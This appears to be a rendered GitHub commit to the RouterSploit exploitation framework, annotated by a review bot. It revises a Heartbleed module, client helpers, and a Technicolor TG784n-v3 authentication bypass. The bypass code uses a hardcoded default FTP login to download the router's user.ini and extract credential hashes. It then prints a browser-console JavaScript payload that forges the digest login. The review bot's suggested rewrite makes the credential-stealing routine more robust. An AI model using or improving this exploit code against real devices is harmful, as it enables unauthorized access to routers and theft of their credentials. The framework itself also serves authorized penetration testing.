Unverified Commit fa0b2fd0 by Marcin Bury Committed by GitHub

Fixing tg784_authbypass, dlink-dsl and heartbleed (#411)

parent eae2c0c7
import socket
import ftplib
import io
from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol
......@@ -62,3 +63,11 @@ class FTPClient(Exploit):
return True
return False
def ftp_get_content(self, ftp_client, remote_file):
if ftp_client:
fp_content = io.BytesIO()
ftp_client.retrbinary("RETR {}".format(remote_file), fp_content.write)
return fp_content.getvalue()
return None
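Review bot: `ftp_get_content` lets every `ftplib` error raised by `retrbinary` (missing file, dropped connection, permission denied) propagate to the caller, which is inconsistent with the `TCPClient` helper in this same commit that catches socket errors and returns None. Wrapping the transfer — `try:` / `    ftp_client.retrbinary("RETR {}".format(remote_file), fp_content.write)` / `except ftplib.all_errors:` / `    return None` — keeps a single None-on-failure contract for callers to test; `ftplib` is already imported in this file. The contract deserves a docstring as well: `"""Download remote_file through ftp_client and return its bytes, or None if there is no client or the transfer fails."""`.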
......@@ -64,6 +64,8 @@ class TCPClient(Exploit):
return response
except socket.timeout:
print_error("Socket did timeout")
except socket.error:
print_error("Socket error")
return None
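Review bot: The new `except socket.error:` branch drops the exception object, so the operator only sees "Socket error" with no reason (connection refused vs. host unreachable vs. reset); `except socket.error as err:` / `print_error("Socket error: {}".format(err))` keeps the message actionable. Since `socket.timeout` is a subclass of `socket.error` (`OSError` on Python 3), the timeout clause must stay in front of it — a short comment prevents a future reorder: `# socket.timeout subclasses socket.error; keep this clause first`. The enclosing method starts outside the hunk.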
......
......@@ -39,6 +39,7 @@ class Exploit(TCPClient):
"https://gist.github.com/takeshixx/10107280",
"https://github.com/FiloSottile/Heartbleed",
"http://filippo.io/Heartbleed/",
"https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb",
),
"devices": (
"Multi",
......@@ -164,7 +165,9 @@ class Exploit(TCPClient):
return False
def bleed(self):
self.establish_connect()
if not self.establish_connect():
print_error("Exploit failed - could not establish connection")
return False
print_status("Sending Heartbeat...")
heartbeat_req = self.heartbeat_request(self.heartbeat_length)
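Review bot: The new guard in `bleed` depends on `establish_connect()` returning a falsy value on failure; the `TCPClient` hunk in this commit shows the socket helper returning None on `socket.timeout`/`socket.error`, so this holds if `establish_connect` passes that result through, but nothing in the hunk states it. A one-line comment pins the assumption: `# establish_connect() returns None on socket failure; bail out before sending the heartbeat`. `bleed` continues past the hunk, so whether the connection is closed on the later failure paths cannot be judged here.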
......
......@@ -35,6 +35,7 @@ class Exploit(HTTPClient):
path=path
)
@mute
def check(self):
response = self.http_request(
method="GET",
......
import re
from StringIO import StringIO
from io import StringIO
from routersploit.core.exploit import *
from routersploit.core.ftp.ftp_client import FTPClient
from routersploit.core.telnet.telnet_client import TelnetClient
class Exploit(FTPClient, TelnetClient):
class Exploit(FTPClient):
__info__ = {
"name": "Technicolor TG784n-v3 Auth Bypass",
"description": "Module exploits Technicolor TG784n-v3 authentication bypass vulnerability.",
"authors": [
"authors": (
"Jose Moreira", # vulnerability discovery & analysis
"0BuRner", # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # little fixes
],
"references": [
),
"references": (
"http://modem-help.forum-phpbb.co.uk/t1-fixing-username-password-problems",
"http://modem-help.forum-phpbb.co.uk/t2-howto-root-tg784",
],
"devices": [
),
"devices": (
"Technicolor TG784n-v3",
"Unknown number of Technicolor and Thompson routers",
]
)
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
port = OptPort(21, "Target FTP port")
ftp_port = exploits.Option(21, 'Target FTP port')
telnet_port = exploits.Option(23, 'Target Telnet port')
remote_user = exploits.Option('upgrade', 'Default FTP username')
remote_pass = exploits.Option('Th0ms0n!', 'Default FTP password for "upgrade" user')
config_path = exploits.Option('user.ini', 'Path to config file')
username = OptString("upgrade", "Default FTP username")
password = OptString("Th0ms0n!", "Default FTP password for \"upgrade\" user")
def run(self):
response = self.telnet_login()
if 'Login not allowed' in response and self.is_port_opened(self.ftp_port):
print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
print_status("FTP and HTTP service active")
creds = self.ftp_get_config()
if creds:
print_status("Use javascript console (through developer tools) to bypass authentication:")
payload = ('var user = "{}"\n'
'var hash2 = "{}";\n'
'var HA2 = MD5("GET" + ":" + uri);\n'
'document.getElementById("user").value = user;\n'
'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
'document.authform.submit();\n')
creds = self.get_credentials()
if creds:
print_success("Found encrypted credentials:")
print_table(("Name", "Password", "Role", "Hash2", "Crypt"), *creds)
print_status("Use javascript console (through developer tools) to bypass authentication:")
payload = ('var user = "{}"\n'
'var hash2 = "{}";\n'
'var HA2 = MD5("GET" + ":" + uri);\n'
'document.getElementById("user").value = user;\n'
'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
'document.authform.submit();\n')
for user in creds:
print_success("User: {} Role: {}".format(user[0], user[2]))
print_info(payload.format(user[0], user[3]))
for user in creds:
print_success("User: {} Role: {}".format(user[0], user[2]))
print_info(payload.format(user[0], user[3]))
elif '}=>' in response:
print_success("Successful authentication through Telnet service")
tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
tn.read_until(': ')
tn.write(self.remote_user + '\r\n')
tn.read_until(': ')
tn.write(self.remote_pass + '\r\n')
tn.interact()
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute
def check(self):
response = self.telnet_login()
if 'Login not allowed' in response and self.is_port_opened(self.ftp_port) and self.ftp_get_config():
return True
elif '}=>' in response:
if self.get_credentials():
return True
return False
def telnet_login(self):
print_status("Telnet: {}:{} Authenticating with Username: {} Password: {}".format(self.target,
self.telnet_port,
self.remote_user,
self.remote_pass))
try:
tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
tn.read_until(': ')
tn.write(self.remote_user + '\r\n')
tn.read_until(': ')
tn.write(self.remote_pass + '\r\n')
response = tn.read_until("Login not allowed", 10)
tn.close()
except:
return ""
return response
def get_credentials(self):
print_status("Trying FTP authentication with Username: {} and Password: {}".format(self.username,
self.password))
def is_port_opened(self, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((self.target, port))
return True
except:
return False
finally:
s.close()
def ftp_get_config(self):
print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target,
self.ftp_port,
self.remote_user,
self.remote_pass))
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.ftp_port), timeout=10)
ftp.login(self.remote_user, self.remote_pass)
print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port))
if self.config_path in ftp.nlst():
print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path))
r = StringIO()
ftp.retrbinary('RETR {}'.format(self.config_path), r.write)
ftp.close()
data = r.getvalue()
creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data)
if creds:
print_success("Found encrypted credentials:")
print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds)
return creds
else:
print_error("Exploit failed - could not find any credentials")
except ftplib.all_errors:
print_error("Exploit failed - FTP error")
ftp_client = self.ftp_login(self.username, self.password)
if ftp_client:
print_success("Authentication successful")
content = self.ftp_get_content(ftp_client, "user.ini")
creds = re.findall(r"add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n", str(content, "utf-8"))
return creds
else:
print_error("Exploit failed - authentication failed")
return None
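Review bot: `get_credentials` never closes the FTP session returned by `ftp_login` (the old code called `ftp.close()`), and `str(content, "utf-8")` raises `TypeError` if `ftp_get_content` returns None and `UnicodeDecodeError` on a non-UTF-8 config file; any `ftplib` error raised by `retrbinary` inside `ftp_get_content` is likewise unhandled, so `check()` would propagate an exception instead of returning False. The rewrite below closes the session in a `finally`, catches `ftplib.all_errors` (which needs `import ftplib` at the top — `from io import StringIO` appears unused on the new side and could be swapped out), and decodes with `errors="replace"`. A minor follow-on in `run`: when authentication succeeds but the regex matches nothing, `get_credentials` returns `[]` and the `if creds:` branch prints nothing, unless an `else` survives that the rendered page lost.
```python
def get_credentials(self):
    """Log in over FTP, fetch user.ini and return the parsed credential tuples, or None on failure."""
    print_status("Trying FTP authentication with Username: {} and Password: {}".format(self.username,
                                                                                       self.password))
    ftp_client = self.ftp_login(self.username, self.password)
    if not ftp_client:
        print_error("Exploit failed - authentication failed")
        return None

    print_success("Authentication successful")
    try:
        content = self.ftp_get_content(ftp_client, "user.ini")
    except ftplib.all_errors as err:
        print_error("Exploit failed - could not retrieve user.ini: {}".format(err))
        return None
    finally:
        # always release the control connection, whether or not the transfer worked
        ftp_client.close()

    if not content:
        print_error("Exploit failed - user.ini is empty or unavailable")
        return None

    # config files are not guaranteed to be valid UTF-8; never let a stray byte abort check()
    text = content.decode("utf-8", errors="replace")
    return re.findall(r"add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n", text)
```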